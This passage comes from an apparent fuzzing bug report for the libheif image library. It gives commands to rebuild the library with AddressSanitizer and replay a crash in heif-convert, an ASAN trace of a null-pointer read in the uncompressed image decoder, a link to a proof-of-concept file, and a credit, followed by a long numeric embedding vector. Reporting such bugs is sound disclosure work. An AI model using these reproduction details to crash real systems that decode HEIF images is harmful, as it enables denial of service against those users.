upsampling algorithm (nn = nearest-neighbor / bilinear) --png-compression-level # Set to integer between 0 (fastest) and 9 (best). Use -1 for default. ``` ### Replay ``` cd libheif mkdir build && cd build CC="gcc -fsanitize=address" CXX="g++ -fsanitize=address" cmake -DCMAKE_BUILD_TYPE=Debug -DWITH_UNCOMPRESSED_CODEC=ON .. make -j ./examples/heif-convert ./poc test.png ``` ### ASAN ``` ==89344==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f955d086aeb bp 0x7ffdd923ebb0 sp 0x7ffdd923e318 T0) ==89344==The signal is caused by a READ memory access. ==89344==Hint: address points to the zero page. #0 0x7f955d086aea in memcpy (/lib/x86_64-linux-gnu/libc.so.6+0xbbaea) #1 0x7f955d85f4de (/lib/x86_64-linux-gnu/libasan.so.4+0x7a4de) #2 0x7f955d6f8495 in UncompressedImageCodec::decode_uncompressed_image(std::shared_ptr<HeifFile const> const&, unsigned int, std::shared_ptr<HeifPixelImage>&, unsigned int, unsigned int, std::vector<unsigned char, std::allocator<unsigned char> > const&) libheif/libheif/uncompressed_image.cc:758 #3 0x7f955d5b7304 in HeifContext::decode_image_planar(unsigned int, std::shared_ptr<HeifPixelImage>&, heif_colorspace, heif_decoding_options const&, bool) const libheif/libheif/context.cc:1452 #4 0x7f955d5b42a8 in HeifContext::decode_image_user(unsigned int, std::shared_ptr<HeifPixelImage>&, heif_colorspace, heif_chroma, heif_decoding_options const&) const libheif/libheif/context.cc:1248 #5 0x7f955d5771f4 in heif_decode_image libheif/libheif/heif.cc:1044 #6 0x55e9351aca11 in main libheif/examples/heif_convert.cc:484 #7 0x7f955cfef082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #8 0x55e9351a7add in _start (libheif/build/examples/heif-convert+0xbadd) ``` ### POC - [poc](https://github.com/fdu-sec/poc/raw/main/libheif/poc5) ### Environment ``` Description: Ubuntu 22.04.2 LTS gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0 ``` ### Credit Yuchuan Meng ([Fudan University](https://secsys.fudan.edu.cn/)) --- end body ---
3,672
[ -0.009771611541509628, 0.02190721407532692, -0.0020500237587839365, -0.014909262768924236, 0.020026767626404762, -0.024056296795606613, -0.03653440997004509, 0.0254129059612751, -0.009006001055240631, 0.011376707814633846, -0.021181898191571236, -0.007327029947191477, 0.010221576318144798, 0.02085953578352928, 0.031564656645059586, 0.0037071681581437588, -0.01840152218937874, 0.01875074952840805, -0.035244960337877274, -0.018817907199263573, 0.02863653004169464, -0.05286744236946106, -0.021799759939312935, 0.005564110353589058, -0.008764228783547878, 0.004536579828709364, -0.009912645444273949, -0.001459865365177393, -0.010980471037328243, 0.034385327249765396, -0.007394188549369574, 0.03932821750640869, -0.024271205067634583, 0.014519741758704185, 0.04719923436641693, 0.01020814385265112, 0.029603617265820503, 0.04824691265821457, 0.012189329601824284, 0.011155083775520325, 0.009153750725090504, -0.048542410135269165, -0.002909656846895814, 0.02711874060332775, -0.028958892449736595, -0.004425767809152603, 0.017018049955368042, 0.0023488805163651705, -0.025896450504660606, 0.021611716598272324, 0.0034721121191978455, -0.013848153874278069, -0.029415573924779892, -0.06452621519565582, 0.01688373275101185, -0.0170449148863554, 0.042847342789173126, 0.026568038389086723, 0.027964942157268524, 0.016682256013154984, -0.04196084663271904, 0.006020790431648493, -0.006527839694172144, 0.023693639785051346, 0.027185900136828423, 0.008139652200043201, 0.007300166413187981, 0.025171134620904922, -0.029791662469506264, 0.0062222667038440704, -0.005859609227627516, -0.031994473189115524, 0.0070718261413276196, 0.029173800721764565, 0.03132288530468941, 0.010611097328364849, 0.03124229423701763, 0.002219599671661854, -0.03352569416165352, 0.03274665027856827, -0.029093211516737938, 0.02100728638470173, -0.054559845477342606, 0.03790445253252983, 0.0402953065931797, -0.0013524112291634083, -0.03089306689798832, -0.061624955385923386, -0.009999951347708702, -0.016789710149168968, -0.012975088320672512, 0.006736031733453274, 0.01868358999490738, 0.0037776848766952753, -0.0018838054966181517, 0.027964942157268524, -0.043680112808942795, -0.004600380547344685, -0.04601724073290825, -0.028179850429296494, -0.027387376874685287, -0.007656108122318983, -0.02823357842862606, 0.02513083815574646, -0.002441223943606019, 0.017179232090711594, 0.007340461481362581, -0.01979842782020569, 0.010389473289251328, 0.11680266261100769, 0.006309573072940111, 0.018240341916680336, -0.01554055605083704, -0.023720502853393555, -0.002464729594066739, 0.012941509485244751, 0.0018854845548048615, 0.011846819892525673, -0.048730455338954926, -0.04819318652153015, 0.009818622842431068, -0.0308393407613039, -0.0035090495366603136, 0.024029433727264404, 0.0006925755878910422, 0.01654793880879879, 0.017904547974467278, -0.04701118916273117, -0.002887830138206482, -0.006830054335296154, -0.03231683373451233, -0.04889163747429848, 0.012619146145880222, -0.0019022742053493857, -0.008945558220148087, -0.004395546391606331, -0.019502928480505943, 0.05327039584517479, 0.03395551070570946, 0.027561988681554794, -0.033149603754282, -0.03956998884677887, 0.021329648792743683, -0.03204819932579994, -0.03245115280151367, 0.026903832331299782, 0.005577541887760162, 0.013485495932400227, 0.009805191308259964, -0.01042976789176464, -0.011061061173677444, 0.015674874186515808, 0.020953558385372162, -0.00018332265608478338, 0.06151749938726425, 0.03363315016031265, 0.03857604041695595, 0.03666872903704643, 0.015312216244637966, -0.0019996545743197203, -0.01541967038065195, -0.0013650035252794623, 0.00194256950635463, -0.036238912492990494, -0.002723291050642729, -0.0025335673708468676, -0.01732698082923889, -0.008885115385055542, 0.011369992047548294, 0.02451297827064991, 0.004224291071295738, 0.03027520701289177, 0.020966989919543266, 0.001485889428295195, -0.06017432361841202, -0.01241095457226038, 0.02150426246225834, 0.021987805142998695, -0.03212879225611687, -0.017300117760896683, 0.011571468785405159, 0.0033344365656375885, 0.013821289874613285, 0.02119533158838749, 0.020523741841316223, -0.016695687547326088, 0.018361227586865425, -0.04155789315700531, 0.027172468602657318, -0.0036937363911420107, 0.02271312102675438, -0.005715217441320419, -0.0015051976079121232, -0.031161703169345856, 0.049912452697753906, -0.024835340678691864, -0.008670206181704998, -0.04021471366286278, 0.012417670339345932, -0.0178239569067955, -0.014439151622354984, -0.009932792745530605, -0.036400094628334045, -0.018361227586865425, -0.012451249174773693, 0.005554036237299442, -0.053565893322229385, 0.03648068383336067, -0.003985877148807049, -0.02128935232758522, -0.0015857882099226117, -0.033391375094652176, 0.02826044149696827, -0.0337674655020237, -0.012256489135324955, 0.01027530338615179, -0.017622480168938637, 0.0020752083510160446, -0.024096593260765076, 0.040241580456495285, 0.022753415629267693, -0.00587304076179862, 0.0009309894521720707, -0.010282019153237343, -0.043465204536914825, -0.010698403231799603, 0.009832054376602173, -0.01118866354227066, -0.007891164161264896, 0.006252488121390343, 0.023975707590579987, -0.034815143793821335, 0.02150426246225834, 0.012531840242445469, 0.009999951347708702, -0.018320932984352112, 0.015876350924372673, -0.02470102161169052, 0.008179946802556515, 0.007394188549369574, -0.022699689492583275, 0.021947510540485382, -0.02055060677230358, -0.04467406123876572, 0.021625148132443428, 0.05829387530684471, -0.031188566237688065, -0.04016098752617836, -0.023223528638482094, 0.012679589912295341, 0.00917389802634716, -0.007575517520308495, -0.014774945564568043, -0.008193379268050194, 0.01707177795469761, 0.024123456329107285, 0.015271920710802078, -0.001986222807317972, -0.01087973266839981, -0.013478780165314674, 0.03231683373451233, -0.0015127529622986913, -0.006474112626165152, 0.00465746596455574, -0.003965729847550392, -0.006077875383198261, -0.02380109392106533, 0.01472121849656105, 0.010698403231799603, -0.02494279481470585, 0.030597569420933723, -0.02863653004169464, -0.02451297827064991, -0.0280455332249403, -0.023626480251550674, 0.018428387120366096, -0.0015370979672297835, 0.0053055486641824245, 0.024244341999292374, -0.0015219872584566474, 0.008394855074584484, -0.005406287033110857, -0.0072733028791844845, 0.022041533142328262, -0.014882399700582027, -0.02949616312980652, 0.015997236594557762, -0.01544653344899416, -0.030194615945219994, -0.04443228989839554, 0.01571516878902912, 0.029818525537848473, -0.05402257293462753, 0.026044199243187904, -0.010973755270242691, 0.018388090655207634, -0.013915312476456165, -0.0009956298163160682, -0.023747367784380913, -0.009637294337153435, 0.004949606955051422, -0.017313549295067787, -0.003102738643065095, -0.007085258141160011, -0.028529075905680656, 0.010550654493272305, -0.03465396165847778, -0.0019660750404000282, -0.014573468826711178, -0.0004600380780175328, 0.06823338568210602, -0.00582602946087718, -0.011470730416476727, -0.009106739424169064, -0.02693069539964199, 0.006521123461425304, -0.013378041796386242, -0.01576889678835869, -0.0325317420065403, 0.020537173375487328, -0.03637322783470154, 0.013639961369335651, -0.037420906126499176, -0.007098689675331116, 0.024580135941505432, -0.006924076937139034, -0.011027482338249683, 0.045533694326877594, -0.06157122552394867, 0.018146319314837456, 0.0020349130500108004, -0.03680304437875748, -0.008085925132036209, -0.011625195853412151, 0.007951606996357441, -0.01472121849656105, -0.04083257541060448, 0.021799759939312935, -0.003942224197089672, 0.01676284708082676, -0.020872969180345535, 0.016601666808128357, -0.014788377098739147, -0.01143715064972639, 0.0007744253962300718, -0.011786377057433128, -0.009382090531289577, 0.006615146063268185, 0.0011106394231319427, 0.043062251061201096, 0.0008881756803020835, 0.011638627387583256, 0.0036299354396760464, 0.03392864763736725, 0.004009382799267769, 0.0002497469540685415, -0.027696307748556137, -0.02885143831372261, 0.006359942257404327, -0.022699689492583275, 0.009610430337488651, -0.019019383937120438, -0.010147701017558575, -0.02605763077735901, 0.020214810967445374, 0.004150416702032089, -0.006591640412807465, -0.0368836373090744, 0.004398904275149107, -0.03836113214492798, -0.007340461481362581, 0.06216222420334816, -0.01989244855940342, 0.016507644206285477, -0.01078571006655693, -0.039838626980781555, -0.0070919739082455635, 0.011766229756176472, -0.022243008017539978, 0.016131553798913956, 0.005369349382817745, 0.0049596806056797504, 0.003727315692231059, -0.0325317420065403, 0.04948263615369797, 0.022135553881525993, -0.00938880629837513, 0.028341032564640045, -0.023451868444681168, -0.013942175544798374, -0.027011286467313766, 0.013384757563471794, -0.026299402117729187, -0.05566124990582466, 0.016400190070271492, 0.02987225353717804, 0.026876969262957573, 0.0005834424518980086, 0.038065630942583084, -0.03027520701289177, 0.00655470322817564, 0.009959656745195389, 0.014425719156861305, -0.0032723145559430122, 0.007622528821229935, 0.042283207178115845, 0.011087925173342228, -0.017864251509308815, 0.024486113339662552, 0.006551345344632864, 0.023357845842838287, -0.004308239556849003, -0.03535241633653641, 0.0018502260791137815, 0.052168987691402435, 0.035809095948934555, -0.017394140362739563, -0.008925409987568855, -0.012303500436246395, 0.044486016035079956, -0.0268098097294569, 0.019811859354376793, 0.0031715764198452234, 0.055177707225084305, 0.031134840101003647, 0.0001378854940412566, -0.0007001309422776103, 0.01532564777880907, 0.025063680484890938, -0.015433101914823055, -0.04139671102166176, -0.0027165752835571766, 0.026541175320744514, 0.004946248605847359, -0.023075778037309647, -0.03911330923438072, -0.007703119423240423, -0.029146937653422356, -0.015057012438774109, -0.02237732708454132, -0.01118866354227066, 0.03089306689798832, -0.0381193608045578, -0.02903948351740837, 0.012525124475359917, -0.045103877782821655, -0.0185895673930645, -0.0010308882920071483, 0.004073183983564377, -0.012934792786836624, -0.026514310389757156, 0.03932821750640869, 0.0018435101956129074, -0.030597569420933723, -0.007716550957411528, -0.026379993185400963, -0.04042962193489075, 0.010342461988329887, 0.030516978353261948, 0.01493612676858902, 0.018320932984352112, 0.019838722422719002, -0.003995951265096664, -0.014909262768924236, 0.004764920100569725, 0.033606283366680145, 0.025184566155076027, -0.033794328570365906, 0.002417718293145299, 0.0009595319861546159, 0.018576135858893394, 0.0347076915204525, 0.012585567310452461, -0.02807239629328251, 0.0020365919917821884, 0.020040199160575867, 0.012296783737838268, -0.02612479031085968, 0.003252167021855712, -0.06898556649684906, 0.012491544708609581, -0.03204819932579994, -0.017528457567095757, 0.004200785420835018, 0.029818525537848473, -0.011343128979206085, 0.003760895226150751, 0.0073471772484481335, -0.009462680667638779, 0.01930145174264908, 0.0009528161026537418, -0.010980471037328243, -0.01849554479122162, -0.023908548057079315, 0.00864334311336279, -0.01078571006655693, -0.006138318218290806, -0.011819956824183464, 0.023223528638482094, 0.011772945523262024, 0.011249106377363205, -0.027091877534985542, 0.03591654822230339, -0.03956998884677887, 0.00036349723814055324, -0.06194731593132019, -0.02423091046512127, 0.04392188414931297, -0.025802427902817726, -0.022968323901295662, 0.021893782541155815, -0.031967610120773315, 0.010826005600392818, -0.02605763077735901, -0.003898570779711008, -0.01022829208523035, 0.01493612676858902, -0.01995960809290409, 0.021799759939312935, 0.010020099580287933, -0.01104762963950634, -0.006101381033658981, 0.01934174634516239, 0.052786849439144135, 0.033821191638708115, 0.0023992497008293867, 0.022820575162768364, -0.014573468826711178, 0.000657317170407623, -0.019408905878663063, 0.0247950442135334, -0.026903832331299782, -0.013136269524693489, 0.01135656051337719, 0.005899904295802116, 0.010557370260357857, -0.039220765233039856, -0.0008466211729682982, 0.013519074767827988, -0.025426337495446205, -0.012551987543702126, 0.04537251591682434, -0.02906634658575058, 0.012484828941524029, -0.0657082125544548, 0.01834779605269432, -0.014224243350327015, 0.019664108753204346, -0.030731886625289917, -0.0021406880114227533, 0.0057857343927025795, -0.024660727009177208, 0.00017797092732507735, 0.03124229423701763, -0.022457916289567947, 0.01934174634516239, 0.005614479072391987, 0.024432387202978134, 0.010315597988665104, 0.011228958144783974, -0.005396212916821241, -0.004348535090684891, 0.009811907075345516, -0.024163750931620598, -0.007622528821229935, 0.003143033944070339, -0.008421719074249268, 0.02283400669693947, -0.021544557064771652, -0.022296736016869545, 0.011786377057433128, 0.010295450687408447, 0.01697775535285473, -0.002755191642791033, 0.0014355202438309789, -0.010584233328700066, -0.01296837255358696, 0.0030389376915991306, 0.0063868057914078236, -0.033391375094652176, 0.039650581777095795, -0.035997141152620316, -0.008958989754319191, 0.039623718708753586, 0.023572754114866257, -0.021141603589057922, 0.011014049872756004, -0.019623814150691032, 0.006403595674782991, 0.007944891229271889, 0.010812574066221714, 0.005026839207857847, -0.0064069535583257675, 0.015822622925043106, -0.008314264938235283, -0.007535221986472607, 0.02141023986041546, -0.0150301493704319, -0.009845486842095852, -0.014586900360882282, -0.03164524585008621, 0.023599617183208466, -0.010067110881209373, -0.04322343319654465, -0.006359942257404327, 0.0020886401180177927, 0.012276636436581612, -0.018025433644652367, -0.00711883744224906, 0.018710453063249588, 0.008851535618305206, 0.04161161929368973, 0.027964942157268524, -0.017434434965252876, 0.007810573559254408, -0.0039556557312607765, 0.025560656562447548, 0.027750033885240555, -0.028743984177708626, -0.007333745714277029, 0.012229625135660172, -0.05507025122642517, 0.0006375892553478479, 0.0010753809474408627, 0.00872393324971199, 0.01366682443767786, -0.020093925297260284, 0.003462038468569517, -0.0049193850718438625, -0.013606381602585316, -0.007817289792001247, 0.029576754197478294, 0.007024814840406179, -0.017958274111151695, -0.037635814398527145, 0.022269872948527336, 0.03049011528491974, 0.008932125754654408, -0.0005229995003901422, -0.021329648792743683, 0.011101356707513332, -0.022968323901295662, -0.017004618421196938, -0.008824671618640423, -0.025265157222747803, -0.02036256156861782, 0.004183996003121138, 0.0069307927042245865, 0.015500260517001152, -0.0011803166707977653, -0.03027520701289177, 0.0042545124888420105, 0.0085224574431777, 0.029361845925450325, 0.008932125754654408, -0.004869016353040934, 0.0588848739862442, 0.04744100570678711, -0.012283352203667164, -0.0070718261413276196, 0.003280709497630596, 0.0019005952635779977, -0.01574203372001648, 0.014962989836931229, 0.021517693996429443, -0.003576208371669054, -0.014989853836596012, -0.028421621769666672, 0.026299402117729187, -0.0074344840832054615, 0.0023102641571313143, -0.02946930006146431, -0.008179946802556515, 0.0017125505255535245, 0.007192712277173996, -0.019005952402949333, 0.017152369022369385, 0.024620432406663895, -0.01756875403225422, 0.020953558385372162, 0.01635989360511303, 0.0013557691127061844, -0.0026443793904036283, 0.020658060908317566, -0.014130220748484135, 0.008757513016462326, 0.00864334311336279, -0.011940842494368553, -0.007703119423240423, -0.03210192546248436, 0.02702471800148487, -0.0071658487431705, 0.02221614494919777, 0.021678874269127846, 0.025117406621575356, -0.027964942157268524, 0.016010668128728867, -0.012243056669831276, -0.015406238846480846, -0.01018128078430891, -0.009664157405495644, 0.02216241881251335, 0.014103356748819351, 0.0014288043603301048, 0.023263823240995407, 0.03395551070570946, 0.0015874671516939998, -0.011282685212790966, -0.0009377053356729448, 0.014640627428889275, -0.02662176452577114, -0.004526506178081036, -0.02963048219680786, 0.02593674510717392, 0.017515026032924652, -0.012471397407352924, -0.008992569521069527, 0.006490902043879032, 0.005950273480266333, -0.0016655393410474062, -0.021128172054886818, -0.017689639702439308, -0.043492067605257034, -0.04443228989839554, 0.022753415629267693, -0.012934792786836624, 0.01794484257698059, 0.010154416784644127, 0.005023481324315071, 0.014600332826375961, -0.014922695234417915, -0.03411669284105301, -0.004553369712084532, 0.017192663624882698, -0.0019190639723092318, -0.019623814150691032, 0.007233007345348597, -0.027588853612542152, 0.012249773368239403, 0.012337079271674156, 0.008495593443512917, -0.011678922921419144, 0.0005637145368382335, -0.030597569420933723, -0.005537246819585562, -0.003205155720934272, 0.00842843484133482, 0.005365991499274969, -0.02925439178943634, 0.017367277294397354, 0.006752821616828442, 0.024580135941505432, 0.015943508595228195, -0.0312960222363472, -0.007394188549369574, 0.007615812588483095, 0.029012620449066162, -0.010053678415715694, -0.00488916365429759, -0.020187947899103165, 0.0009402238065376878, 0.011799808591604233, -0.00737404078245163, 0.04131612181663513, 0.014291401952505112, -0.013552654534578323, 0.03854917734861374, -0.009046296589076519, 0.019193997606635094, 0.006944224238395691, 0.035997141152620316, 0.00196439609862864, -0.029523028060793877, -0.0004415693983901292, 0.031000521034002304, -0.026997854933142662, -0.012740032747387886, 0.05122876539826393, 0.00545329786837101, 0.04480838030576706, -0.043304022401571274, 0.004073183983564377, -0.024472681805491447, 0.03790445253252983, -0.005288758780807257, -0.0008781018550507724, 0.007011383306235075, -0.028797712177038193, -0.009677588939666748, 0.008562752045691013, 0.0006040098378434777, 0.00619876105338335, 0.04980499669909477, -0.01188711542636156, -0.009536555968225002, -0.010389473289251328, -0.018508976325392723, -0.011799808591604233, 0.007353893481194973, -0.0443248376250267, -0.0011971063213422894, 0.020375993102788925, -0.020711787045001984, -0.035218097269535065, -0.02605763077735901, -0.014976422302424908, 0.000406101142289117, 0.03857604041695595, -0.027038149535655975, 0.023062346503138542, 0.004452631343156099, -0.0025318884290754795, 0.027279922738671303, 0.030705023556947708, 0.028179850429296494, -0.009348510764539242, -0.006658799480646849, -0.01265944167971611, 0.005584257654845715, -0.004543295595794916, -0.022887732833623886, 0.0156480111181736, -0.007656108122318983, -0.04582919552922249, -0.006433817092329264, -0.010053678415715694, 0.02615165337920189, 0.008314264938235283, 0.009469396434724331, 0.0020483448170125484, -0.0034553224686533213, 0.012551987543702126, -0.0071658487431705, 0.020617764443159103, -0.01049021165817976, 0.042847342789173126, 0.0015404559671878815, 0.012585567310452461, -0.02159828320145607, 0.026796378195285797, -0.016198713332414627, 0.001633638865314424, -0.017582185566425323, 0.00041449599666520953, -0.0040194569155573845, -0.04319656640291214, -0.03274665027856827, -0.015459965914487839, -0.012639294378459454, -0.022565370425581932, 0.0028525718953460455, 0.020993854850530624, -0.006695736665278673, 0.007494926918298006, -0.012592283077538013, 0.011034198105335236, -0.01524505764245987, -0.025157703086733818, 0.00615846598520875, -0.014586900360882282, 0.05069149658083916, 0.006094664800912142, -0.013438484631478786, -0.014479446224868298, 0.02292802929878235, -0.016467347741127014, -0.006430459208786488, -0.0072531551122665405, 0.013613097369670868, 0.004331745207309723, -0.017018049955368042, -0.017998570576310158, 0.04136984795331955, 0.018737317994236946, -0.03731345385313034, -0.014613764360547066, 0.02847534976899624, -0.005906620062887669, 0.027776896953582764, 0.039059583097696304, -0.015755465254187584, 0.014371992088854313, -0.007065110374242067, 0.028394758701324463, 0.026997854933142662, -0.03731345385313034, 0.012807191349565983, -0.03545986860990524, -0.01523162517696619, 0.0058092400431632996, 0.0027148963417857885, 0.005819313693791628, -0.037877585738897324, -0.018267204985022545, 0.03774327039718628, 0.025829290971159935, 0.005275327246636152, 0.011558037251234055, -0.01621214486658573, -0.00830754917114973, 0.005889830645173788, 0.015849487856030464, 0.015567420050501823, -0.008112788200378418, -0.02026853896677494, -0.02745453454554081, 0.0399729423224926, 0.003945582080632448, -0.0071658487431705, 0.00833441223949194, 0.03685677424073219, -0.005654774606227875, -0.01143715064972639, -0.03250487893819809, -0.03194074705243111, -0.004012740682810545, -0.02351902611553669, 0.007138985209167004, 0.004949606955051422, 0.052759986370801926, 0.005886472761631012, -0.008878398686647415, -0.007568801753222942, 0.008938842453062534, -0.0001929767313413322, -0.025372611358761787, -0.03414355590939522, 0.017421003431081772, -0.026662060990929604, 0.012719884514808655, -0.0072531551122665405, 0.008932125754654408, 0.01191397849470377, -0.007051678374409676, -0.010611097328364849, 0.01853584125638008, -0.030409524217247963, 0.012766895815730095, -0.006309573072940111, -0.03895213082432747, -0.009059728123247623, 0.018885066732764244, 0.01523162517696619, 0.015916645526885986, -0.01889849826693535, 0.010805858299136162, 0.0007618331001140177, -0.012881065718829632, 0.016158416867256165, -0.05490906909108162, -0.041907116770744324, -0.022753415629267693, -0.012598998844623566, -0.006692378781735897, -0.00973131600767374, 0.010960322804749012, -0.008401570841670036, -0.022054964676499367, -0.03454650938510895, 0.01735384576022625, 0.023236960172653198, -0.0002497469540685415, -0.021235626190900803, 0.00020714304991997778, 0.020537173375487328, 0.0016546259867027402, -0.045506831258535385, 0.008226958103477955, -0.02373393438756466, -0.0505034513771534, 0.005137651693075895, 0.005429792683571577, 0.01515103504061699, 0.0033562632743269205, -0.007750130258500576, 0.012787044048309326, -0.016655392944812775, -0.019973039627075195, -0.026823241263628006, -0.01380785834044218, -0.018938792869448662, -0.010013383813202381, 0.05047658458352089, -0.004429125692695379, 0.024633863940835, -0.021772896870970726, 0.0028038816526532173, 0.014828672632575035, -0.0300602987408638, -0.019113406538963318, 0.0029852106235921383, -0.011571468785405159, 0.005446582101285458, -0.01602409966289997, 0.01875074952840805, 0.0026678850408643484, -0.016252439469099045, 0.0016730946954339743, 0.005275327246636152, -0.018938792869448662, -0.030570704489946365, -0.013425053097307682, 0.029415573924779892, -0.013196712359786034, -0.025990473106503487, 0.026541175320744514, -0.001619367627426982, 0.022672824561595917, -0.024311501532793045, 0.0015891460934653878, -0.025493497028946877, 0.0017662775935605168, 0.030114024877548218, -0.009973088279366493, -0.0002268709649797529, -0.007360609248280525, -0.0017083530547097325, 0.022753415629267693, -0.007098689675331116, 0.041477300226688385, -0.01676284708082676, -0.0046104546636343, -0.017917979508638382, -0.012518408708274364, 0.00032886845292523503, 0.02404286526143551, -0.008697070181369781, 0.009973088279366493, 0.02119533158838749, 0.0073471772484481335, -0.0254129059612751, 0.005020123440772295, 0.006282709538936615, -0.01073869876563549, -0.004999975673854351, -0.001774672418832779, 0.027320217341184616, -0.03046325035393238, -0.027588853612542152, 0.008314264938235283, 0.029764799401164055, 0.004294808022677898, -0.012518408708274364, -0.005483519751578569, -0.01754188910126686, 0.012437817640602589, 0.01392874401062727, -0.004140342585742474, -0.004654107615351677, -0.017837388440966606, 0.0015043581370264292, -0.0003721019602380693, 0.031779564917087555, -0.011302833445370197, -0.009012716822326183, -0.005255179479718208, -0.010503643192350864, -0.009576850570738316, -0.015177898108959198, -0.015083876438438892, -0.02513083815574646, 0.0031917239539325237, -0.01744786649942398, -0.023532459512352943, -0.04032216966152191, -0.00869035441428423, -0.017219526693224907, -0.006171897519379854, 0.004006024915724993, 0.007763562258332968, 0.006877065636217594, 0.011249106377363205, -0.009617146104574203, -0.0359434112906456, 0.021893782541155815, -0.022941460832953453, 0.0022615741472691298, -0.013794426806271076, -0.0185895673930645, -0.00711883744224906, -0.01887163519859314, -0.005980494897812605, -0.008764228783547878, 0.01664196141064167, -0.04040275886654854, 0.0015471718506887555, 0.006682304665446281, -0.02010735683143139, 0.008938842453062534, 0.008697070181369781, -0.007971754297614098, -0.007078541908413172, -0.00931493192911148, -0.022323599085211754, -0.005224958062171936, -0.0012449570931494236, 0.016722552478313446, 0.054989662021398544, -0.014425719156861305, -0.0055607520043849945, -0.0023404855746775866, 0.012585567310452461, 0.02014765329658985, -0.01135656051337719, 0.027038149535655975, -0.0057857343927025795, 0.005893188528716564, 0.008871682919561863, -0.01822691038250923, 0.003131281118839979, 0.013082542456686497, 0.0110006183385849, 0.008549320511519909, -0.0031917239539325237, -0.001461544306948781, 0.02621881291270256, -0.012881065718829632, 0.0150301493704319, 0.001974469982087612, 0.013472063466906548, -0.029146937653422356, 0.016171850264072418, -0.011108072474598885, -0.052974894642829895, -0.03323019668459892, -0.031752701848745346, -0.011148368008434772, 0.012807191349565983, -0.009066443890333176, -0.008032198064029217, -0.006813264451920986, 0.019811859354376793, -0.01453317329287529, 0.02562781423330307, -0.0021876993123441935, -0.020228244364261627, -0.010100689716637135, -0.0005225797649472952, -0.03204819932579994, -0.00020682824833784252, 0.024365227669477463, -0.008757513016462326, -0.03919390216469765, 0.03132288530468941, 0.005980494897812605, -0.008401570841670036, -0.004704476799815893, 0.021772896870970726, -0.01402276661247015, 0.017179232090711594, 0.013592950068414211, 0.002416039351373911, 0.03634636476635933, 0.005191378761082888, -0.017085209488868713, -0.010651392862200737, -0.027561988681554794, 0.012746748514473438, -0.000648922345135361, 0.0005649737431667745, -0.01165205892175436, 0.0074143363162875175, 0.004304881673306227, -0.028743984177708626, 0.0006308733718469739, -0.017864251509308815, 0.009476113133132458, 0.005402929149568081, -0.007965038530528545, 0.0007018098840489984, 0.0031010594684630632, -0.008294116705656052, 0.027803761884570122, -0.009026148356497288, 0.01595694199204445, -0.011987853795289993, -0.03572850301861763, 0.04762905091047287, 0.020067062228918076, 0.011987853795289993, 0.02290116623044014, -0.01664196141064167, 0.013169849291443825, -0.011302833445370197, -0.02008049376308918, 0.015661442652344704, -0.012236340902745724, -0.004798499401658773, 0.006517765577882528, 0.008858251385390759, -0.016198713332414627, 0.022511644288897514, 0.023559322580695152, 0.002093676943331957, -0.010006668046116829, -0.015876350924372673, -0.013089258223772049, 0.010376040823757648, -0.012867634184658527, 0.031027385964989662, -0.010631244629621506, -0.009254488162696362, 0.030973657965660095, -0.0007345498306676745, 0.02178632840514183, -0.01875074952840805, -0.0021927361376583576, -0.045291922986507416, -0.02190721407532692, 0.013196712359786034, -0.025923313573002815, -0.010013383813202381, 0.01837465912103653, 0.01623900793492794, -0.004395546391606331, -0.004355250857770443, -0.02513083815574646, -0.020470015704631805, -0.00920076109468937, 0.03809249401092529, -0.005114146042615175, 0.0078240055590868, 0.014654059894382954, -0.002256537089124322, -0.02761571668088436, 0.04075198620557785, 0.026796378195285797, 0.013767562806606293, -0.006991235539317131, 0.016346462070941925, -0.014197379350662231, 0.011705785989761353, -0.047118645161390305, 0.015003285370767117, 0.007602381054311991, -0.0072061438113451, 0.001788104185834527, -0.008938842453062534, 0.012343795038759708, 0.043868158012628555, -0.009919361211359501, 0.0028542508371174335, -0.015285352244973183, 0.01280047558248043, 0.016225576400756836, 0.0075083584524691105, 0.013095973990857601, 0.0036567989736795425, -0.022350462153553963, -0.01069168746471405, 0.03301528841257095, -0.008535888977348804, 0.012209477834403515, 0.02280714362859726, -0.009140318259596825, -0.0012038222048431635, -0.018240341916680336, 0.0026427004486322403, 0.008999285288155079, 0.023666776716709137, 0.010463347658514977, 0.009509691968560219, 0.030973657965660095, 0.0227802786976099, -0.03027520701289177, -0.013069110922515392, -0.017917979508638382, 0.0150301493704319, 0.013982471078634262, -0.022202713415026665, 0.014600332826375961, 0.012135602533817291, 0.030167752876877785, -0.008609763346612453, 0.014519741758704185, 0.03323019668459892, -0.023653345182538033, 0.0041369847021996975, 0.016816575080156326, 0.005057061091065407, -0.010335746221244335, 0.027508262544870377, -0.02287430129945278, 0.001454828423447907, -0.0047346982173621655, -0.027387376874685287, 0.022511644288897514, -0.00012120072642574087, 0.036185186356306076, -0.02159828320145607, -0.008952273987233639, 0.004946248605847359, -0.03674931824207306, -0.02586958557367325, -0.031806427985429764, -0.013438484631478786, 0.012666157446801662, -0.0015983805060386658, -0.024338364601135254, -0.007031531073153019, 0.000029723034458584152, 0.00785758439451456, -0.0036803046241402626, 0.005789092276245356, -0.011061061173677444, -0.02026853896677494, 0.005043629091233015, -0.02766944281756878, -0.006527839694172144, 0.009496260434389114, 0.019932745024561882, 0.012444533407688141, 0.006101381033658981, 0.001962717156857252, -0.019932745024561882, 0.007447915617376566, 0.00426122872158885, -0.009885781444609165, 0.014667491428554058, 0.022887732833623886, 0.007709835190325975, -0.0015194688457995653, 0.01453317329287529, 0.03046325035393238, -0.004130268935114145, -0.007998618297278881, 0.001622725510969758, -0.007105405442416668, -0.0037978326436132193, -0.019932745024561882, 0.02968420833349228, -0.034842006862163544, -0.01104762963950634, 0.013794426806271076, 0.020644627511501312, 0.01633303053677082, -0.008979137055575848, -0.016655392944812775, -0.004022814799100161, -0.04373383894562721, -0.005866324994713068, -0.006443891208618879, -0.0001920323120430112, 0.015124171040952206, -0.018079159781336784, -0.01027530338615179, 0.025480065494775772, -0.031591519713401794, -0.011994569562375546, 0.0006929953233338892, 0.0019106690306216478, -0.019099975004792213, 0.015782328322529793, -0.005597689654678106, -0.003965729847550392, -0.005577541887760162, -0.0002453396446071565, 0.0067293159663677216, 0.011833388358354568, -0.005507024936378002, 0.002968420973047614, -0.011920694261789322, 0.014989853836596012, 0.013384757563471794, -0.011880399659276009, 0.011752797290682793, -0.0028206713031977415, -0.013639961369335651, -0.01165205892175436, 0.0013985829427838326, -0.022296736016869545, -0.025184566155076027, 0.02181319147348404, 0.010093973949551582, -0.009952940978109837, 0.009053012356162071, -0.0026746008079499006, 